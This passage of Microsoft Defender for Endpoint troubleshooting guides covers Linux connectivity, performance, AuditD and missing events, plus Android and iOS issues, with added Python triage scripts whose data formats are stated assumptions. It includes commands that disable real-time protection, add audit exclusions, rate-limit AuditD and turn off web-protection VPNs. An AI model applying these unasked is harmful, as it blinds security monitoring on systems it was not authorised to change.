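    failed = [r for r in results if not r["ok"]]
    return {
        "failed_hosts": sorted({r["host"] for r in failed}),
        "tls_inspection_suspected": any(r["curl_error"] in PINNING_ERRORS for r in failed),
        "allowlist": sorted({r["host"] for r in results}),
    }


def validate_static_proxy(value: str) -> list:
    """Problems with a value meant for `mdatp config proxy set --value ...`.
    Only an unauthenticated static http://host:port proxy is supported."""
    parts = urlsplit(value)
    if parts.scheme.lower() != "http" or not parts.hostname:
        return ["use the form http://proxy_address:port"]
    problems = []
    if parts.username or parts.password:
        problems.append("authenticated proxies are not supported; remove the credentials")
    if parts.port is None:
        problems.append("proxy port is missing")
    if parts.path.lower().endswith(".pac"):
        problems.append("PAC files are not supported; point at the proxy itself")
    return problems


# Constructed sample; the "[ERROR] curl error N" rendering is an assumption.
SAMPLE_OUTPUT = """\
Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [ERROR] curl error 60
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [ERROR] curl error 35
Testing connection with https://eu-v20.events.data.microsoft.com/ping ... [OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [ERROR]
"""

if __name__ == "__main__":
    summary = summarize(parse_connectivity(SAMPLE_OUTPUT))
    print("failed:", summary["failed_hosts"])
    if summary["tls_inspection_suspected"]:
        print("curl 35/60 seen: exempt these hosts from SSL inspection")
    print("allowlist:", summary["allowlist"])
    print("proxy check:", validate_static_proxy("http://user:secret@proxy.corp.example:8080"))
```

Pipe the real output in with mdatp connectivity test | python3 triage.py after replacing SAMPLE_OUTPUT with sys.stdin.read(); the allowlist it prints is the set of hostnames the product actually probed on that host, which is the list a network team can act on.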

Resources

For more information about how to configure the product to use a static proxy,
see Configure Microsoft Defender for Endpoint for static proxy discovery.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Troubleshoot issues for Microsoft
Defender for Endpoint on Linux RHEL6
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

This article provides guidance on how to troubleshoot issues you might encounter with
Microsoft Defender for Endpoint on Linux on Red Hat Enterprise Linux 6 (RHEL 6) or higher.

After the package (mdatp_XXX.XX.XX.XX.x86_64.rpm) is installed, take the following actions
to verify that the installation was successful.

Check the service health


Use the following command to check the service health:

Bash

mdatp health

Verify that the service is running


Use the following command to verify that the service is running:

Bash

service mdatp status

Expected output: mdatp start/running, process 4517

Verify the distribution and kernel version


The distribution and kernel versions should be on the supported list.

Use the following command to get the distribution version:

Bash

cat /etc/redhat-release (or /etc/system-release)

Use the following command to get the kernel version:

Bash

uname -r

Check if mdatp audisp process is running


The expected output is that the process is running.

Use the following command to check:

Bash

pidof mdatp_audisp_plugin

Check TALPA modules


There should be nine modules loaded.

Use the following command to check:

Bash

lsmod | grep talpa

Expected output (nine TALPA modules loaded):

Output

talpa_pedconnector 878 0
talpa_pedevice 5189 2 talpa_pedconnector
talpa_vfshook 32300 1
talpa_vcdevice 4947 1
talpa_syscall 9127 0
talpa_core 90699 4 talpa_vfshook,talpa_vcdevice,talpa_syscall
talpa_linux 29424 5 talpa_vfshook,talpa_vcdevice,talpa_syscall,talpa_core
talpa_syscallhookprobe 882 0
talpa_syscallhook 14987 2 talpa_vfshook,talpa_syscallhookprobe

Bash

lsmod | grep talpa | wc -l

Expected output: 9

Check TALPA status


Bash

cat /proc/sys/talpa/interceptors/VFSHookInterceptor/status

Debug log files (apart from the 'mdatp diagnostic create' bundle)

Bash

/var/log/audit/audit.log

/var/log/messages

semanage fcontext -l > selinux.log

Performance and Memory

Bash

top -p <wdavdaemon pid>

pmap -x <wdavdaemon pid>

Where <wdavdaemon pid> can be found using pidof wdavdaemon.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Troubleshoot performance issues for
Microsoft Defender for Endpoint on
Linux
Article • 04/27/2023

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This document explains how to narrow down performance issues related to Defender for
Endpoint on Linux using the available diagnostic tools, so that you can understand and
mitigate resource shortages and identify the processes that cause them. Performance
problems are mainly caused by bottlenecks in one or more hardware subsystems, depending
on the profile of resource utilization on the system. Some applications are sensitive to
disk I/O and may need more CPU capacity; some configurations aren't sustainable and
trigger too many new processes or open too many file descriptors.

Depending on the applications that you are running and your device characteristics, you
may experience suboptimal performance when running Defender for Endpoint on Linux.
In particular, applications or system processes that access many resources such as CPU,
Disk, and Memory over a short timespan can lead to performance issues in Defender for
Endpoint on Linux.

Warning

Before starting, please make sure that other security products are not currently
running on the device. Multiple security products may conflict and impact the host
performance.

Troubleshoot performance issues using Real-time Protection Statistics

Applies to:

Only performance issues related to AV

Real-time protection (RTP) is a feature of Defender for Endpoint on Linux that
continuously monitors and protects your device against threats. It consists of file and
process monitoring and other heuristics.

The following steps can be used to troubleshoot and mitigate these issues:

1. Disable real-time protection using one of the following methods and observe
whether the performance improves. This approach helps narrow down whether
Defender for Endpoint on Linux is contributing to the performance issues.

If your device is not managed by your organization, real-time protection can be
disabled from the command line:

Bash

mdatp config real-time-protection --value disabled

Output

Configuration property updated

If your device is managed by your organization, real-time protection can be
disabled by your administrator using the instructions in Set preferences for
Defender for Endpoint on Linux.

Note

If the performance problem persists while real-time protection is off, the
origin of the problem could be the endpoint detection and response (EDR)
component. In this case please follow the steps from the Troubleshoot
performance issues using Microsoft Defender for Endpoint Client Analyzer
section of this article.

2. To find the applications that are triggering the most scans, you can use real-time
statistics gathered by Defender for Endpoint on Linux.

Note

This feature is available in version 100.90.70 or newer.

This feature is enabled by default on the Dogfood and InsiderFast channels. If
you're using a different update channel, this feature can be enabled from the
command line:

Bash

mdatp config real-time-protection-statistics --value enabled

This feature requires real-time protection to be enabled. To check the status of
real-time protection, run the following command:

Bash

mdatp health --field real_time_protection_enabled

Verify that the real_time_protection_enabled entry is true. Otherwise, run the
following command to enable it:

Bash

mdatp config real-time-protection --value enabled

Output

Configuration property updated

To collect current statistics, run:

Bash

mdatp diagnostic real-time-protection-statistics --output json

Note

Using --output json (note the double dash) ensures that the output format is
ready for parsing.

The output of this command will show all processes and their associated scan
activity.
3. On your Linux system, download the sample Python parser high_cpu_parser.py
using the command:

Bash

wget -c https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/linux/diagnostic/high_cpu_parser.py

The output of this command should be similar to the following:

Output

--2020-11-14 11:27:27--
https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/linux/diagnostic/high_cpu_parser.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
151.101.xxx.xxx
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|
151.101.xxx.xxx| :443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1020 [text/plain]
Saving to: 'high_cpu_parser.py'
100%[===========================================>] 1,020 --.-K/s
in 0s

4. Next, type the following commands:

Bash

mdatp diagnostic real-time-protection-statistics --output json | python high_cpu_parser.py

The output of the above is a list of the top contributors to performance issues. The
first column is the process identifier (PID), the second column is the process name,
and the last column is the number of scanned files, sorted by impact. For example,
the output of the command will be something like the below:

Output

... > mdatp diagnostic real-time-protection-statistics --output json | python high_cpu_parser.py | head
27432 None 76703
73467 actool 1249
73914 xcodebuild 1081
73873 bash 1050
27475 None 836
1 launchd 407
73468 ibtool 344
549 telemetryd_v1 325
4764 None 228
125 CrashPlanService 164

To improve the performance of Defender for Endpoint on Linux, locate the one
with the highest number under the Total files scanned row and add an exclusion
for it. For more information, see Configure and validate exclusions for Defender for
Endpoint on Linux.

Note

The application stores statistics in memory and only keeps track of file activity since it was started and real-time protection was enabled. Processes that were launched before or during periods when real-time protection was off are not counted. Additionally, only events which triggered scans are counted.
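An added example (not the page's high_cpu_parser.py) that goes one step further than the per-PID ranking above: it sums scanned files across all PIDs that share a process name, since an exclusion applies to a binary rather than a PID, and flags names such as bash that the page warns against excluding. The JSON field names id, name, path and total_files_scanned and the sample document are assumptions.

```python
"""Rank real-time-protection statistics by scanned files, per PID and per process name.

Added example, not Microsoft's high_cpu_parser.py.  Assumes the JSON emitted by
`mdatp diagnostic real-time-protection-statistics --output json` is a list of objects
with "id", "name", "path" and "total_files_scanned" fields (field names are an
assumption); the sample document below is constructed."""
import json
import sys
from collections import defaultdict

# Constructed sample that mirrors the column layout shown on the page (PID, name, scanned).
SAMPLE_STATS = json.dumps([
    {"id": 73467, "name": "actool", "path": "/usr/bin/actool", "total_files_scanned": 1249},
    {"id": 73914, "name": "xcodebuild", "path": "/usr/bin/xcodebuild", "total_files_scanned": 1081},
    {"id": 73873, "name": "bash", "path": "/bin/bash", "total_files_scanned": 1050},
    {"id": 27432, "name": None, "path": None, "total_files_scanned": 76703},
    {"id": 27475, "name": None, "path": None, "total_files_scanned": 836},
])

# Initiators that should never be excluded wholesale: excluding a shell or interpreter
# blinds real-time protection to everything launched through it (the page's /bin/bash warning).
BROAD_INITIATORS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}


def parse_stats(text):
    """Normalize the JSON into (pid, name, path, scanned) tuples; tolerate a wrapped list."""
    data = json.loads(text)
    if isinstance(data, dict):  # assumption: some outputs may wrap the list in an object
        data = next((v for v in data.values() if isinstance(v, list)), [])
    rows = []
    for item in data:
        rows.append((int(item.get("id", 0)), item.get("name") or "None",
                     item.get("path") or "", int(item.get("total_files_scanned", 0))))
    return rows


def top_contributors(rows, n=10):
    """Per-PID ranking, highest scanned-file count first (same shape as the page's output)."""
    return sorted(rows, key=lambda r: r[3], reverse=True)[:n]


def aggregate_by_name(rows):
    """Sum scanned files across PIDs sharing a process name, noisiest name first."""
    totals = defaultdict(int)
    for _, name, _, scanned in rows:
        totals[name] += scanned
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


def exclusion_candidates(rows, min_share=0.05):
    """Names worth an exclusion review: at least min_share of all scans.

    Shells/interpreters and unresolved names ("None") are marked for review instead of
    being offered as exclusion candidates."""
    total = sum(r[3] for r in rows) or 1
    out = []
    for name, scanned in aggregate_by_name(rows):
        if scanned / total < min_share:
            break  # list is sorted, so everything after this is below the threshold
        if name == "None":
            verdict = "review: unresolved process name, identify the binary first"
        elif name in BROAD_INITIATORS:
            verdict = "review: broad initiator, do not exclude wholesale"
        else:
            verdict = "candidate"
        out.append((name, scanned, verdict))
    return out


if __name__ == "__main__":
    # Reads the mdatp JSON from stdin when piped, otherwise runs on the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_STATS
    rows = parse_stats(text)
    for pid, name, _, scanned in top_contributors(rows):
        print(pid, name, scanned)
    for name, scanned, verdict in exclusion_candidates(rows, 0.01):
        print(f"{name:<12} {scanned:>8}  {verdict}")
```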

5. Configure Microsoft Defender for Endpoint on Linux with exclusions for the processes or disk locations that contribute to the performance issues and re-enable real-time protection.

For more information, see Configure and validate exclusions for Microsoft
Defender for Endpoint on Linux.

Troubleshoot performance issues using Microsoft Defender for Endpoint Client Analyzer

Applies to:

Performance issues of all available Defender for Endpoint components such as AV and EDR

The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs, and diagnostic information in order to troubleshoot performance issues on onboarded devices on Linux.

Note

The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by Microsoft Customer Support Services (CSS) to collect information such as (but not limited to) IP addresses and PC names that will help troubleshoot issues you may be experiencing with Microsoft Defender for Endpoint. For more information about our privacy statement, see Microsoft Privacy Statement.
As a general best practice, it is recommended to update the Microsoft Defender for Endpoint agent to the latest available version and confirm that the issue still persists before investigating further.

To run the client analyzer for troubleshooting performance issues, see Run the client
analyzer on macOS and Linux.

Note

If the performance problem persists after following the above steps, contact customer support for further instructions and mitigation.

Troubleshoot AuditD performance issues

Background:

Microsoft Defender for Endpoint on Linux OS distributions uses the AuditD framework to collect certain types of telemetry events.

System events captured by rules added to /etc/audit/rules.d/ will add to the audit.log(s) and might affect host auditing and upstream collection.

Events added by Microsoft Defender for Endpoint on Linux will be tagged with the mdatp key.

If the AuditD service is misconfigured or offline, then some events might be missing. To troubleshoot such an issue, refer to: Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux.

In certain server workloads, two issues might be observed:

High CPU resource consumption from mdatp_audisp_plugin process.

/var/log/audit/audit.log becoming large or frequently rotating.

These issues may occur on servers with many events flooding AuditD.

Note

As a best practice, we recommend configuring AuditD logs to rotate when the maximum file size limit is reached. This will prevent AuditD logs accumulating in a single file, and the rotated log files can be moved out to save disk space.

To achieve this, set the value for max_log_file_action to rotate in the auditd.conf file.

This can happen if there are multiple consumers for AuditD, too many rules from the combination of Microsoft Defender for Endpoint and third-party consumers, or a high workload that generates a lot of events.

To troubleshoot such issues, begin by collecting MDEClientAnalyzer logs on the sample affected server.

Note

As a general best practice, it is recommended to update the Microsoft Defender for Endpoint agent to the latest available version and confirm that the issue still persists before investigating further.

Note that there are additional configurations that can affect AuditD subsystem CPU strain.

Specifically, in auditd.conf, the value for disp_qos can be set to "lossy" to reduce the high CPU consumption.

However, this means that some events may be dropped during peak CPU
consumption.

XMDEClientAnalyzer

When you use XMDEClientAnalyzer, the following files will display output that provides insights to help you troubleshoot issues.

auditd_info.txt
auditd_log_analysis.txt

auditd_info.txt

Contains general AuditD configuration and will display:

What processes are registered as AuditD consumers.

Auditctl -s output: enabled=2 suggests auditd is in immutable mode (requires a restart for any config changes to take effect).

Auditctl -l output: shows what rules are currently loaded into the kernel (which may be different from what exists on disk in "/etc/auditd/rules.d/mdatp.rules"), and which rules are related to Microsoft Defender for Endpoint.

auditd_log_analysis.txt
Contains important aggregated information that is useful when investigating AuditD
performance issues.

Which component owns the most reported events (Microsoft Defender for
Endpoint events will be tagged with key=mdatp ).

The top reporting initiators.

The most common system calls (network or filesystem events, and others).

What file system paths are the noisiest.
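As an added example (not Microsoft's XMDEClientAnalyzer code), the following script reproduces the four aggregations listed above over audit.log records: it joins each SYSCALL record with its PATH records by audit event id, then counts events per key, per initiator (exe), per syscall and per parent directory, which is the unit an AuditD path exclusion works on. The record layout is the standard auditd format; the syscall name table is a partial x86_64 mapping and the log lines are constructed.

```python
"""Aggregate auditd records the way auditd_log_analysis.txt does.

Added example, not Microsoft's XMDEClientAnalyzer code.  The audit records below are
constructed; their layout (type=... msg=audit(ts:serial): field=value ...) is the
standard auditd format.  Syscall names come from a partial x86_64 table."""
import re
from collections import Counter, defaultdict
from pathlib import PurePosixPath

# Partial x86_64 (arch=c000003e) syscall number -> name map; enough for the sample.
X86_64_SYSCALLS = {"2": "open", "42": "connect", "59": "execve", "87": "unlink",
                   "257": "openat", "263": "unlinkat"}

# Constructed records: three events from /opt/app/bin/app and one execve from bash
# (all key="mdatp"), plus one open of /etc/passwd tagged by another consumer's rule.
# The "----" separators are what ausearch prints between events and must be skipped.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=257 success=yes exit=4 ppid=1 pid=4120 uid=1001 comm="app" exe="/opt/app/bin/app" key="mdatp"
type=PATH msg=audit(1700000000.101:501): item=0 name="/opt/app/cfg/logs/1234.log" inode=7733 mode=0100644
----
type=SYSCALL msg=audit(1700000000.102:502): arch=c000003e syscall=257 success=yes exit=4 ppid=1 pid=4120 uid=1001 comm="app" exe="/opt/app/bin/app" key="mdatp"
type=PATH msg=audit(1700000000.102:502): item=0 name="/opt/app/cfg/logs/1235.log" inode=7734 mode=0100644
----
type=SYSCALL msg=audit(1700000000.103:503): arch=c000003e syscall=42 success=yes exit=0 ppid=1 pid=4120 uid=1001 comm="app" exe="/opt/app/bin/app" key="mdatp"
type=SOCKADDR msg=audit(1700000000.103:503): saddr=02000050C0A80001
----
type=SYSCALL msg=audit(1700000000.104:504): arch=c000003e syscall=59 success=yes exit=0 ppid=900 pid=4130 uid=0 comm="bash" exe="/usr/bin/bash" key="mdatp"
type=PATH msg=audit(1700000000.104:504): item=0 name="/usr/bin/ls" inode=1201 mode=0100755
----
type=SYSCALL msg=audit(1700000000.105:505): arch=c000003e syscall=2 success=yes exit=3 ppid=1 pid=2210 uid=0 comm="sshd" exe="/usr/sbin/sshd" key="auth-monitor"
type=PATH msg=audit(1700000000.105:505): item=0 name="/etc/passwd" inode=33 mode=0100644
"""

RECORD_RE = re.compile(r'^type=(?P<type>\S+) msg=audit\((?P<id>[\d.]+:\d+)\):\s*(?P<body>.*)$')
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_record(line):
    """Split one audit record into (type, event_id, {field: value}); None if not a record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m.group("body"))}
    return m.group("type"), m.group("id"), fields


def group_events(lines):
    """Join the SYSCALL record and its PATH records into one event per audit id."""
    events = defaultdict(lambda: {"syscall": {}, "paths": []})
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # separator, blank line or truncated record
        rtype, event_id, fields = rec
        if rtype == "SYSCALL":
            events[event_id]["syscall"] = fields
        elif rtype == "PATH" and "name" in fields:
            events[event_id]["paths"].append(fields["name"])
    return events


def analyze(lines):
    """Counters like auditd_log_analysis.txt: by key, initiator, syscall and path directory."""
    by_key, by_exe, by_syscall, by_dir = Counter(), Counter(), Counter(), Counter()
    for ev in group_events(lines).values():
        sc = ev["syscall"]
        if not sc:
            continue  # no SYSCALL record, so nothing to attribute to a rule or initiator
        by_key[sc.get("key", "(none)")] += 1
        by_exe[sc.get("exe", "?")] += 1
        num = sc.get("syscall", "?")
        by_syscall[X86_64_SYSCALLS.get(num, f"syscall {num}")] += 1
        for p in ev["paths"]:
            by_dir[str(PurePosixPath(p).parent)] += 1
    return {"keys": by_key, "initiators": by_exe, "syscalls": by_syscall, "directories": by_dir}


def report(analysis, top_n=3):
    """Render the top entries of each aggregation as text, noisiest first."""
    lines = []
    for title, counter in analysis.items():
        lines.append(f"Top {title}:")
        for item, count in counter.most_common(top_n):
            lines.append(f"  {count:6d}  {item}")
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    # Pipe /var/log/audit/audit.log on stdin; without a pipe the constructed sample is used.
    src = sys.stdin if not sys.stdin.isatty() else SAMPLE_AUDIT_LOG.splitlines()
    print(report(analyze(src)))
```

A directory that dominates the "directories" counter while its initiator is a low-threat application (here /opt/app/bin/app writing under /opt/app/cfg/logs) is the kind of high-noise path the exclusion syntax below is meant for; /usr/bin/bash showing up as an initiator is not.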

To mitigate most AuditD performance issues, you can implement AuditD exclusions. If the exclusions do not improve performance, you can use the rate limiter option, which reduces the number of events generated by AuditD altogether.

Note

Exclusions should be made only for low-threat and high-noise initiators or paths. For example, do not exclude /bin/bash, which risks creating a large blind spot. See Common mistakes to avoid when defining exclusions.

Exclusion Types

The XMDEClientAnalyzer support tool contains syntax that can be used to add AuditD exclusion configuration rules:

AuditD exclusion – support tool syntax help:

By initiator

-e / -exe full binary path > Removes all events by this initiator

By path

-d / -dir full path to a directory > Removes filesystem events targeting this directory

Examples:

If "/opt/app/bin/app" writes to "/opt/app/cfg/logs/1234.log", then you can use the support tool to exclude it with various options:

-e /opt/app/bin/app

-d /opt/app/cfg

-x /usr/bin/python /etc/usercfg

-d /usr/app/bin/

More examples:

./mde_support_tool.sh exclude -p <process id>

./mde_support_tool.sh exclude -e <process name>

To exclude more than one item, concatenate the exclusions into one line:

./mde_support_tool.sh exclude -e <process name> -e <process name 2> -e <process name3>

The -x flag is used to exclude access to subdirectories by specific initiators, for example:

./mde_support_tool.sh exclude -x /usr/sbin/mv /tmp

The above will exclude monitoring of the /tmp subfolder when accessed by the mv process.

Rate Limiter

The XMDEClientAnalyzer support tool contains syntax that can be used to limit the number of events being reported by the AuditD plugin. This option sets the rate limit globally for AuditD, causing a drop in all audit events.

Note

This functionality should be used carefully, as it limits the number of events being reported by the auditd subsystem as a whole. This could reduce the number of events for other subscribers as well.

The ratelimit option can be used to enable/disable this rate limit.

Enable: ./mde_support_tool.sh ratelimit -e true

Disable: ./mde_support_tool.sh ratelimit -e false

When the ratelimit is enabled a rule will be added in AuditD to handle 2500 events/sec.

Note

Please contact Microsoft support if you need assistance with analyzing and
mitigating AuditD related performance issues, or with deploying AuditD exclusions
at scale.

See also
Investigate agent health issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This article provides some general steps to mitigate missing events or alerts in the Microsoft Defender portal.

Once Microsoft Defender for Endpoint has been installed properly on a device, a device page will be generated in the portal. You can review all recorded events in the timeline tab on the device page, or in the advanced hunting page. This section troubleshoots the case where some or all expected events are missing, for instance, if all CreatedFile events are missing.

Missing network and login events

Microsoft Defender for Endpoint uses the Linux audit framework to track network and login activity.

1. Make sure audit framework is working.

Bash

service auditd status

Expected output:

Output

● auditd.service - Security Auditing Service
Loaded: loaded (/usr/lib/systemd/system/auditd.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2020-12-21 10:48:02 IST; 2 weeks 0 days ago
Docs: man:auditd(8)
https://github.com/linux-audit/audit-documentation
Process: 16689 ExecStartPost=/sbin/augenrules --load (code=exited, status=1/FAILURE)
Process: 16665 ExecStart=/sbin/auditd (code=exited, status=0/SUCCESS)
Main PID: 16666 (auditd)
Tasks: 25
CGroup: /system.slice/auditd.service
├─16666 /sbin/auditd
├─16668 /sbin/audispd
├─16670 /usr/sbin/sedispatch
└─16671 /opt/microsoft/mdatp/sbin/mdatp_audisp_plugin -d

2. If auditd is marked as stopped, start it.

Bash

service auditd start

On SLES systems, SYSCALL auditing in auditd might be disabled by default and can account for missing events.

1. To validate that SYSCALL auditing is not disabled, list the current audit rules:

Bash

sudo auditctl -l

If the following line is present, remove it or edit it to enable Microsoft Defender for Endpoint to track specific SYSCALLs.

Output

-a task, never

Audit rules are located at /etc/audit/rules.d/audit.rules.

Missing file events

File events are collected with the fanotify framework. In case some or all file events are missing, make sure fanotify is enabled on the device and that the file system is supported.

List the filesystems on the machine with:

Bash

df -Th


Troubleshooting issues on Microsoft Defender for Endpoint on Android
Article • 09/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

During onboarding, you might encounter sign-in issues after the app is installed on your device.

This article provides solutions to help address these sign-in issues.

Sign in failed - unexpected error

Sign in failed: Unexpected error, try later

Message:

Unexpected error, try later

Cause:

You have an older version of the "Microsoft Authenticator" app installed on your device.

Solution:

Install the latest version of Microsoft Authenticator from the Google Play Store and try again.

Sign in failed - invalid license

Sign in failed: Invalid license, contact administrator

Message: Invalid license, contact administrator

Cause:

You don't have a Microsoft 365 license assigned, or your organization doesn't have a license for a Microsoft 365 Enterprise subscription.

Solution:

Contact your administrator for help.

Report unsafe site

Phishing websites impersonate trustworthy websites for obtaining your personal or
financial information. Visit the Provide feedback about network protection page if you
want to report a website that could be a phishing site.

Phishing pages aren't blocked on some OEM devices

Applies to: Specific OEMs only

Xiaomi
Phishing and harmful web threats detected by Defender for Endpoint for Android aren't
blocked on some Xiaomi devices. The following functionality doesn't work on these
devices.

Cause:

Xiaomi devices include a new permission model. This permission model prevents
Defender for Endpoint for Android from displaying pop-up windows while it runs in the
background.

Xiaomi devices permission: "Display pop-up windows while running in the background."

Solution:

Enable the required permission on Xiaomi devices.

Display pop-up windows while running in the background.

Unable to allow permission for 'Permanent protection' during onboarding on some OEM devices

Applies to: Specific OEM devices only.

Xiaomi

Defender App asks for Battery Optimization/Permanent Protection permission on devices as part of app onboarding, and selecting Allow returns an error that the permission couldn't be set. It only affects the last permission called "Permanent Protection."

Cause:

Xiaomi changed the battery optimization permissions in Android 11. Defender for
Endpoint isn't allowed to configure this setting to ignore battery optimizations.

Solution:

1. Install the MDE app in the personal profile. (Sign-in isn't required.)
2. Open the Company Portal and tap Settings.
3. Go to the Battery Optimization section, tap the Turn Off button, and then select Allow to turn off Battery Optimization for the Company Portal.
4. Again, go to the Battery Optimization section and tap the Turn On button. The battery saver section opens.
5. Find the Defender app and tap on it.
6. Select No Restriction. Go back to the Defender app in the work profile and tap the Allow button.
7. The application shouldn't be uninstalled from the personal profile for this to work.

Note

This is a temporary workaround. This can be used to unblock onboarding on Xiaomi devices. The Defender team is working on a permanent fix. As the MDE app is not onboarded in the personal profile, it will not have any visibility there.

Unable to use banking applications with MDE app

Applies to: Banking apps like iMobile Pay (ICICI), PNB ONE.

Cause: Android allows apps in the personal profile to check if there's a VPN active on
the device, even outside of the personal profile. The banking app checks that and blocks
it in VPN work profiles only. The banking app doesn't work with any other VPN product.

Solution: Users need to disable MDE VPN from the Settings page. The following steps
can be used:

1. Go to Settings on the mobile device.
2. Search for VPN or open 'Network and Internet' and select VPN.
3. Select Microsoft Defender and select Disconnect.

Users should enable VPN when they're no longer using the banking app to ensure that
their devices are protected.

Note

This is a temporary workaround. We are working on other alternatives to provide users more control over the VPN settings from within the app.

Send in-app feedback

If a user faces an issue which isn't already addressed in the above sections or is unable to resolve it using the listed steps, the user can provide in-app feedback along with diagnostic data. Our team can then investigate the logs to provide the right solution. Users can follow these steps to do so:

1. Open the MDE application on your device and select the profile icon in the top-left corner.

2. Select "Help & feedback".

3. Select "Send feedback to Microsoft".

4. Choose from the given options. To report an issue, select "I want to report an issue".

5. Provide details of the issue that you're facing and check "Send diagnostic data". We recommend checking "Include your email address" so that the team can reach back to you with a solution or a follow-up.

6. Select "Submit" to send the feedback.
Troubleshoot issues and find answers to FAQs on Microsoft Defender for Endpoint on iOS
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Control Filter not working as expected on Supervised devices: Control Filter is not working as expected from iOS 16.1 onwards. This has impacted the Web Protection capability for Supervised devices without local loopback VPN. The issue has been resolved with iOS 16.3. Support for Control Filter is re-enabled with the new version, 1.1.38010102.

This topic provides troubleshooting information to help you address issues that may
arise as you use Microsoft Defender for Endpoint on iOS.

Note

Defender for Endpoint on iOS uses a VPN in order to provide the Web Protection feature. This is not a regular VPN; it is a local/self-looping VPN that does not take traffic outside the device.

Apps don't work when VPN is turned on

There are some apps that stop functioning when an active VPN is detected. You can
disable the VPN during the time you're using such apps.

By default, Defender for Endpoint on iOS includes and enables the web protection
feature. Web protection helps to secure devices against web threats and protect users
from phishing attacks. Defender for Endpoint on iOS uses a VPN in order to provide this
protection. Note that this is a local VPN and unlike traditional VPN, network traffic isn't
sent outside the device.

While enabled by default, there might be some cases that require you to disable VPN.
For example, you want to run some apps that don't work when a VPN is configured. In
such cases, you can choose to disable the VPN directly from the Defender for Endpoint
app or using the following steps:

1. On your iOS device, open the Settings app, click or tap General and then VPN.

2. Click or tap the "i" button for Microsoft Defender for Endpoint.

3. Toggle off Connect On Demand to disable VPN.


Note

Web Protection will not be available when VPN is disabled. To re-enable Web
Protection, open the Microsoft Defender for Endpoint app on the device and
Enable Web Protection.

Coexistence with multiple VPN profiles

Apple iOS doesn't support multiple device-wide VPNs to be active simultaneously.
While multiple VPN profiles can exist on the device, only one VPN can be active at a
time. If you need to use another VPN on the device, you can disable Defender for
Endpoint VPN while you're using the other VPN.

Battery consumption
In order to provide you all-time protection from web-based threats, Microsoft Defender
for Endpoint needs to run in the background at all times. This might lead to a minor
increase in overall battery consumption of your device. In case you're seeing significant
battery drain, send us feedback and we'll investigate.

Also, in the Settings app, iOS only shows battery usage of apps that are visible to the
user for a specific duration of time. The battery usage by apps shown on the screen is
only for that time duration and is computed by iOS based on a multitude of factors,
including CPU and Network usage. Microsoft Defender for Endpoint uses a local/loop-
back VPN in the background to check web traffic for any malicious websites or
connections. Network packets from any app go through this check and that causes the
battery usage of Microsoft Defender for Endpoint to be computed inaccurately. The
actual battery consumption of Microsoft Defender for Endpoint is lesser than what is
shown on the Battery Settings page on the device.

Note that the VPN used is a local VPN and unlike a traditional VPN, network traffic isn't
sent outside the device.

Data usage
Microsoft Defender for Endpoint uses a local/loopback VPN to check web traffic for any
malicious websites or connections. Due to this reason, Microsoft Defender for Endpoint
data usage can be inaccurately accounted for. We've also observed that if the device is
on cellular network only, the data usage reported by service provider is very close to the
actual consumption whereas in the Settings app, the numbers can be inaccurate.

We have similar observations with other VPN services as well.

In addition, it's critical for Microsoft Defender for Endpoint to be up to date with our backend services to provide better protection.

Report unsafe site

Phishing websites impersonate trustworthy websites for obtaining your personal or
financial information. Visit the Provide feedback about network protection page to
report a website that could be a phishing site.

Malicious site detected

Microsoft Defender for Endpoint protects you against phishing or other web-based
attacks. If a malicious site is detected, the connection is blocked and an alert is sent to
the organization's Microsoft Defender portal. The alert includes the domain name of the
connection, remote IP address and the device details.

In addition, a notification is shown on the iOS device. Tapping on the notification opens
the following screen for the user to review the details.

Device not seen on the Defender for Endpoint console after onboarding

